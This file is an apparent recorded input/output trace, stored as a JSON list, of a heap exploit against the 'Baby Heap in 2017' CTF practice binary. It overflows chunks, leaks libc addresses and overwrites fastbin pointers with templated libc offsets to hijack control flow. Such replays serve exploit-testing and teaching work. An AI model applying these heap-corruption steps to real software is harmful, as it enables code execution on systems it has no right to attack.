[
    "1===== Baby Heap in 2017 =====\\n1. Allocate\\n2. Fill\\n3. Free\\n4. Dump\\n5. Exit\\nCommand: ", 
    "01\\n", 
    "1Size: ", 
    "016\\n", 
    "1Allocate Index 0\\n1. Allocate\\n2. Fill\\n3. Free\\n4. Dump\\n5. Exit\\nCommand: ", 
    "01\\n", 
    "1Size: ", 
    "0480\\n", 
    "1Allocate Index 1\\n1. Allocate\\n2. Fill\\n3. Free\\n4. Dump\\n5. Exit\\nCommand: ", 
    "01\\n", 
    "1Size: ", 
    "0512\\n", 
    "1Allocate Index 2\\n1. Allocate\\n2. Fill\\n3. Free\\n4. Dump\\n5. Exit\\nCommand: ", 
    "01\\n", 
    "1Size: ", 
    "0512\\n", 
    "1Allocate Index 3\\n1. Allocate\\n2. Fill\\n3. Free\\n4. Dump\\n5. Exit\\nCommand: ", 
    "03\\n", 
    "1Index: ", 
    "01\\n", 
    "11. Allocate\\n2. Fill\\n3. Free\\n4. Dump\\n5. Exit\\nCommand: ", 
    "02\\n", 
    "1Index: ", 
    "00\\n", 
    "1Size: ", 
    "025\\n", 
    "1Content: ", 
    "0AAAAAAAAAAAAAAAAAAAAAAAA0", 
    "11. Allocate\\n2. Fill\\n3. Free\\n4. Dump\\n5. Exit\\nCommand: ", 
    "01\\n", 
    "1Size: ", 
    "0128\\n", 
    "1Allocate Index 1\\n1. Allocate\\n2. Fill\\n3. Free\\n4. Dump\\n5. Exit\\nCommand: ", 
    "01\\n", 
    "1Size: ", 
    "096\\n", 
    "1Allocate Index 4\\n1. Allocate\\n2. Fill\\n3. Free\\n4. Dump\\n5. Exit\\nCommand: ", 
    "03\\n", 
    "1Index: ", 
    "01\\n", 
    "11. Allocate\\n2. Fill\\n3. Free\\n4. Dump\\n5. Exit\\nCommand: ", 
    "03\\n", 
    "1Index: ", 
    "02\\n", 
    "11. Allocate\\n2. Fill\\n3. Free\\n4. Dump\\n5. Exit\\nCommand: ", 
    "01\\n", 
    "1Size: ", 
    "0128\\n", 
    "1Allocate Index 1\\n1. Allocate\\n2. Fill\\n3. Free\\n4. Dump\\n5. Exit\\nCommand: ", 
    "04\\n", 
    "1Index: ", 
    "04\\n", 
    "1Content: \\n{{{LIBC_BASE:3823224:8:ORI:18:0x7fa0618b5678}}}{{{LIBC_BASE:3823224:8:ORI:18:0x7fa0618b5678}}}\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\n1. Allocate\\n2. Fill\\n3. Free\\n4. Dump\\n5. Exit\\nCommand: ", 
    "02\\n", 
    "1Index: ", 
    "01\\n", 
    "1Size: ", 
    "0144\\n", 
    "1Content: ", 
    "0BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB\\x90\\x00\\x00\\x00\\x00\\x00\\x00\\x00p\\x00\\x00\\x00\\x00\\x00\\x00\\x00", 
    "11. Allocate\\n2. Fill\\n3. Free\\n4. Dump\\n5. Exit\\nCommand: ", 
    "03\\n", 
    "1Index: ", 
    "04\\n", 
    "11. Allocate\\n2. Fill\\n3. Free\\n4. Dump\\n5. Exit\\nCommand: ", 
    "02\\n", 
    "1Index: ", 
    "01\\n", 
    "1Size: ", 
    "0152\\n", 
    "1Content: ", 
    "0BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB\\x90\\x00\\x00\\x00\\x00\\x00\\x00\\x00p\\x00\\x00\\x00\\x00\\x00\\x00\\x00{{{LIBC_BASE:3823085:8:ORI:144:0x7fa0618b55ed}}}", 
    "11. Allocate\\n2. Fill\\n3. Free\\n4. Dump\\n5. Exit\\nCommand: ", 
    "01\\n", 
    "1Size: ", 
    "096\\n", 
    "1Allocate Index 2\\n1. Allocate\\n2. Fill\\n3. Free\\n4. Dump\\n5. Exit\\nCommand: ", 
    "01\\n", 
    "1Size: ", 
    "096\\n", 
    "1Allocate Index 4\\n1. Allocate\\n2. Fill\\n3. Free\\n4. Dump\\n5. Exit\\nCommand: ", 
    "02\\n", 
    "1Index: ", 
    "04\\n", 
    "1Size: ", 
    "027\\n", 
    "1Content: ", 
    "0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00{{{LIBC_BASE:267124:8:ORI:19:0x7fa061551374}}}", 
    "11. Allocate\\n2. Fill\\n3. Free\\n4. Dump\\n5. Exit\\nCommand: ", 
    "01\\n", 
    "1Size: ", 
    "096\\n"
]